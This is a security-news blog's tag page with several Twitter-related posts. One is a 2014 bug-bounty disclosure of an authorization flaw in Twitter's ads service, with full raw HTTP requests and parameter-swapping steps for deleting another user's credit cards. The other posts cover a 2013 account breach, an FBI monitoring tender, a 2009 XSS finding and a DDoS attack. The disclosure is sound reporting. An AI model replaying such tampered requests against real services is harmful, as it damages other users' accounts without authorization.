Posts tagged: Twitter

Sep 16 2014

Twitter Vulnerability Allows Hacker to Delete Credit Cards from any Account

Twitter Delete Credit Card VulnerabilityAt the beginning of this month, just like other social networks, Twitter also started paying individuals for any flaws they uncover on its service with a fee of $140 or more offered per flaw under its new Bug Bounty program, and here comes the claimant.

An Egyptian Security Researcher, Ahmed Aboul-Ela, who have been rewarded by many reputed and popular technology giants including Google, Microsoft and Apple, have discovered a critical vulnerability in Twitter’s advertising service that allowed him deleting credit cards from any Twitter account.

Actually he found two vulnerabilities not one but both was having the same effect and impact.

#First Vulnerability
The first vulnerability he had spotted was in the delete functionality of credit cards in payments method page

https://ads.twitter.com/accounts/[account id]/payment_methods

Twitter Vulnerability Delete Credit Card

When he choose to delete credit card and press on the delete button, an ajax POST request is sent to the server like the following:

POST /accounts/18ce53wqoxd/payment_methods/destroy HTTP/1.1
Host: ads.twitter.com
Connection: keep-alive
Content-Length: 29
Accept: /
Origin: https://ads.twitter.com
X-CSRF-Token: Lb6HONDceN5mGvAEUvCQNakJUspD60Odumz/trVdQfE=
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://ads.twitter.com/accounts/18ce53wqoxd/payment_methods
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Cookie: [cookies here]
account=18ce53wqoxd&id=219643

There are only two post parameters sent in request body-
account: the twitter account id
id: the credit card id and it’s numerical without any alphabetic characters

All he had to do is to change those two parameters to his twitter account id and credit card id, then reply again the request and he suddenly found that credit card have been delete from the other twitter account without any required interaction.

The funny part that the page response was “403 forbbiden” but the credit card was actually deleted from the account :D

#Second Vulnerability
Aboul-Ela found another similar vulnerability but this time the impact was higher than the previous one.
when he tried to add an invalid credit card to his twitter account it displayed an error message

“we were unable to approve the card you entered” and show a button called “Dismiss”

Hacking Twitter Delete Credit Cards

When he pressed on the Dismiss button the credit card was disappeared from his account, so he thought it have the same effect of deleteing, so he tried to add invalid credit card again and intercepted the request which looks like the following:

POST /accounts/18ce53wqoxd/payment_methods/handle_failed/220152 HTTP/1.1
Host: ads.twitter.com
Connection: keep-alive
Content-Length: 108
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://ads.twitter.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://ads.twitter.com/accounts/18ce53wqoxd/payment_methods
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Cookie: [Cookies Here]
utf8=%E2%9C%93&authenticity_token=Lb6HONDceN5mGvAEUvCQNakJUspD60Odumz%2FtrVdQfE%3D
&id=220152&dismiss=Dismiss

This time account parameter doesn’t exists and only credit card id is used.

So he changed the id in the url and body to his credit card id from other twitter account then replied the request, and guess what?
Credit card got deleted from the other twitter account !

VIDEO DEMONSTRATION:

Feb 02 2013

Twitter Hacked – 250,000 Accounts Compromised

Twitter HackedIn a blog post last Friday, Twitter’s Director of Information Security Bob Lord, said the company had discovered a major attack and shut it down almost immediately, but the attackers may have had access to user names, email addresses, session tokens and passwords for approximately 250,000 users.

Lord said that Twitter detected unusual access patterns that led to it identifying unauthorised access attempts to Twitter user data.

“We discovered one live attack and were able to shut it down in process moments later. As a precautionary security measure, we have reset passwords and revoked session tokens for these accounts. If your account was one of them, you will have recently received (or will shortly) an email from us at the address associated with your Twitter account notifying you that you will need to create a new password. Your old password will not work when you try to log in to Twitter.

Though only a very small percentage of our users were potentially affected by this attack, we encourage all users to take this opportunity to ensure that they are following good password hygiene, on Twitter and elsewhere on the Internet. Make sure you use a strong password – at least ten (but more is better) characters and a mixture of upper- and lowercase letters, numbers, and symbols – that you are not using for any other accounts or sites.

Using the same password for multiple online accounts significantly increases your odds of being compromised. If you are not using good password hygiene, take a moment now to change your Twitter passwords. We also echo the advisory from the US Department of Homeland Security and security experts to encourage users to disable Java on their computers in their browsers”.

The attack follows hacks into a number of major media outlets, including The Washington Post, The New York Times, and The Wall Street Journal. Unnamed sources quoted by the newspapers say they suspect Chinese hackers, possibly associated with the Chinese government, to be involved.

Twitter have not mention that how hackers were able to infiltrate Twitter’s systems, but Twitter’s blog post alluded that hackers had broken in through a zero-day vulnerability in Oracle’s Java software.

Jan 26 2012

FBI will Monitor Social Media using Crawl Application

FBI Monitor FacebookThe Federal Bureau of Investigation is looking for a better way to spy on Facebook and Twitter users.

The Bureau is asking companies to build software that can effectively scan social media online for significant words, phrases and behavior so that agents can respond.

A paper posted on the FBI website asks for companies to build programs that will map sentiment and wrongdoing.

“The application must be infinitely flexible and have the ability to adapt quickly to changing threats to maintain the strategic and tactical advantage,” the Request for Information said, “The purpose of this effort is to meet the outlined objectives…for the enhancement [of] FBI SOIC’s overall situation awareness and improved strategic decision making.”The tool would be used in “reconnaisance and surveillance missions, National Special Security Events (NSS) planning, NSSE operations, SOIC operations, counter intelligence, terrorism, and more.

Although the police, including in Britain, already use Facebook routinely to ascertain the whereabouts of criminals, automatically filtering out irrelevant information remains challenging. The new FBI application will be able to automatically highlight the most relevant information.

The FBI is seeking responses by 10 February.

Sep 05 2009

How I cross-site scripted Twitter in 15 minutes

How I cross-site scripted Twitter in 15 minutes, and why you shouldn’t store important data on 37signals’ applications
“Today the Ruby on Rails security team released a patch for a cross-site scripting issue which affected multiple high-profile applications, including Twitter and Basecamp. If you’re concerned about the issue and would like to see the patch, please read the advisory from the Rails security team. In this post, I discuss the overall process of finding the issue, and the reason why I’d suggest that no important information be stored on the 37signals applications (Basecamp, Highrise, Backpack, and Campfire).

After seeing a bug in Unicode handling in an unrelated program a few weeks ago, I suddenly had an idea: “I wonder if there are any web applications which have Unicode handling problems that might be security issues?”

My attention quickly turned to Twitter, the only web application I had open at that moment. A few minutes later, I had JavaScript from a URL query parameter falling through the escaping routines and running in the main body of twitter.com. Bingo! Cross-site scripting, the stuff that Twitter worms are made of. But was this a Twitter-specific issue, or did it affect other sites too?”
- Brian Mastenbrook

Source: Brian Mastenbrook

Aug 08 2009

Twitter, Facebook attack targeted one user

A Georgian blogger with accounts on Twitter, Facebook, LiveJournal, and Google’s Blogger and YouTube was targeted in a denial-of-service attack that led to the site-wide outage at Twitter and problems at the other sites on Thursday, according to a Facebook executive.

The blogger, who uses the account name “Cyxymu,” (the name of a town in the Republic of Georgia) had accounts on all of the different sites that were attacked at the same time, Max Kelly, chief security officer at Facebook, told CNET News.

“It was a simultaneous attack across a number of properties targeting him to keep his voice from being heard,” Kelly said. “We’re actively investigating the source of the attacks, and we hope to be able to find out the individuals involved in the back end and to take action against them, if we can.”

witter was down for several hours beginning early Thursday morning, and it suffered periodic slowness and time-outs throughout the day.

Cyxymu’s LiveJournal page wasn’t accessible, but a cached version showed that it was updated on Thursday with a message about the denial-of-service, or DoS, attacks on his accounts on the United States-based sites. “Now it’s obvious it’s a special attack against me and Georgians,” said the message, in Russian.

The site also apologized for a spam e-mail attack in which the sender was spoofed and made to look like the e-mails were sent by him. Screenshots are shown. It’s unclear whether or how the spam attack is related to the DoS attacks.

Facebook and Google were able to minimize any impact to their sites, including Blogger, YouTube, and Google Sites, a free Web site service. Facebook even managed to keep the Cyxymu account accessible to Web surfers from that region, Kelly said, though it was inaccessible to people in other geographic areas, including San Francisco.

Source: CNET News